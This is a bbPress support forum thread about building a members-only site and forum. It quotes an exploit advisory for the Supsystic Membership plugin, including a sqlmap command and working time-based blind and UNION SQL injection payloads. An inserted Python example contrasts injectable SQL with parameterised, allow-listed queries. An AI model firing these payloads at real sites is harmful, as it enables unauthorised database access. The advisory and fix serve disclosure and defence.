
Creating a Membership Site + Forum


  • kantholz93
    Participant

    @kantholz93

    I wanted to create a membership site with: Membership by Supsystic and integrate bbPress for the forum part.
    But this has been exploited on February 8th, so it’s no longer an option.

    We wanted that:
    – members can interact with each other
    – the forum is only for registered members
    – members need approval for registration (they have to pay first)
    – some WordPress pages are only for registered members
    – all other wordpress pages are visible for everyone

    All of this was achievable with the Members by Supsystic Plugin + the paid extension to limit some pages only for members.

    Is there any alternative that works with bbPress? Our forum already uses bbPress and we wanted to keep it that way.

    Thank you very much for any help!

    This is our actual membership page on our website (idk if you need it): https://nestli-seminare.de/netzwerk/login-bereich/

    Thanks!

    Nicklas


  • Robin W
    Moderator

    @robin-w

    My virus checker doesn’t like the sploitus website – what is the nature of the exploitation?


    kantholz93
    Participant

    @kantholz93

    The Plugin was (luckily) not installed. We just decided to use it, then we saw that WordPress has taken it down on their Plugin Site.

    The exploit seems to be an SQL Injection.

    # 1. Description

    The GET parameters “search” and “sidx” do not sanitize user input when searching for badges.

    # 2. Proof of Concept (PoC)

    Use ZAP/Burp to capture the web request when searching for data and save it to request.txt
    Referer: http://192.168.0.63/wp-admin/admin.php?page=supsystic-membership&module=badges&action=index

    sqlmap -r request.txt –dbms=mysql -p search

    Parameter: search (GET)
    Type: time-based blind
    Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s’ AND (SELECT 8958 FROM (SELECT(SLEEP(5)))oBIL) AND ‘trjK’=’trjK&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc

    Type: UNION query
    Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s’ UNION ALL SELECT NULL,CONCAT(0x71786a6b71,0x6569796370704c625352574e6e424874456a74457847635473525a466d47576f775a46446b4e7055,0x716a7a6a71),NULL,NULL– -&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc
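
The advisory quoted above names two parameters, "search" (a value) and "sidx" (a sort column), and they need different fixes. This is an added example, not part of the original posts and not the plugin's code: it uses Python with sqlite3 and a constructed `badges` table as assumptions, showing the concatenating pattern next to a version that binds the search term and allow-lists the sort column and direction.

```python
import sqlite3

# Constructed stand-in for the badges table; not the plugin's real schema.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE badges (id INTEGER PRIMARY KEY, label TEXT)")
    db.executemany("INSERT INTO badges (label) VALUES (?)",
                   [("gold",), ("silver",), ("100%_club",)])
    return db

SORT_COLUMNS = {"id": "id", "label": "label"}   # allow-list for sidx
SORT_ORDERS = {"asc": "ASC", "desc": "DESC"}    # allow-list for sord

def escape_like(term):
    # Make %, _ and the escape character literal inside a LIKE pattern.
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")

def list_badges_unsafe(db, search, sidx="id", sord="desc"):
    # Pattern the advisory describes: request values concatenated into SQL,
    # so a quote in `search` or any text in `sidx` becomes part of the query.
    sql = ("SELECT id, label FROM badges WHERE label LIKE '%" + search +
           "%' ORDER BY " + sidx + " " + sord)
    return db.execute(sql).fetchall()

def list_badges_safe(db, search, sidx="id", sord="desc"):
    # Identifiers cannot be bound as parameters, so sidx/sord are mapped
    # through allow-lists with a default; the search term is a bound value.
    column = SORT_COLUMNS.get(sidx, "id")
    order = SORT_ORDERS.get(str(sord).lower(), "DESC")
    sql = ("SELECT id, label FROM badges WHERE label LIKE ? ESCAPE '\\' "
           f"ORDER BY {column} {order}")
    return db.execute(sql, ("%" + escape_like(search) + "%",)).fetchall()

if __name__ == "__main__":
    db = make_db()
    probe = "x' OR 1=1 --"                       # constructed test input
    print("unsafe:", list_badges_unsafe(db, probe))
    print("safe:  ", list_badges_safe(db, probe))
    print("sort fallback:", list_badges_safe(db, "", "not_a_column", "asc"))
```

In a WordPress plugin the same two steps correspond to `$wpdb->prepare()` with `$wpdb->esc_like()` for the search value and an allow-list check for the column name before it reaches `ORDER BY`.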


    Robin W
    Moderator

    @robin-w

    If you are happy to have a hands on approach to user registrations, then you probably don’t need a membership plugin.

    As far as the bbpress part goes

    forums set to public are viewable by anyone
    forums set to private are viewable only by registered users

    so if you set forums to private they will not appear to unregistered users, so only visible once a user has logged in. If you set not to allow anonymous posting (dashboard>settings>forums), then only registered users will be able to post.

    bbpress just uses wordpress users for login and registration with an extra bbpress parameter, so you can just use wordpress to set up users.

    If you are going to have manual registration, then you turn off ‘anyone can register’ in wordpress (dashboard>settings>general>membership), and create a form using a form plugin (eg contact form 7) to let users ask to register with whatever fields you want. This will be emailed to whoever you want, who can then decide if they should allow membership.
    You can then take payment manually (eg bank transfer) or via say a Paypal link on your site.

    The approver would then add the user (2 minutes or less).

    As far as wordpress page content then use a plugin that restricts content to registered users such as

    Content Control – User Access Restriction Plugin

    finally you would use

    bbPress Messages

    to allow users to message each other – don’t worry that this plugin has not been updated for a while – it is stable and works

    as far as I can see that would meet your requirements list.


    kantholz93
    Participant

    @kantholz93

    Thank you very much! I will implement and test it over the next few days, but your solution sounds just perfect!

    You saved me! Thanks. 🙂


    kantholz93
    Participant

    @kantholz93

    I’ve implemented your solution and it works pretty good so far. Thanks again.

    When I go to the URL of a private Forum (while not logged in) it just throws a 404. Can I somehow redirect the User to a Login page?


    Robin W
    Moderator

    @robin-w

    bbp style pack

    once activated go to

    dashboard>settings>bbp style pack>Subscription Emails and there is a box to tick item 2 auto login and the appropriate login
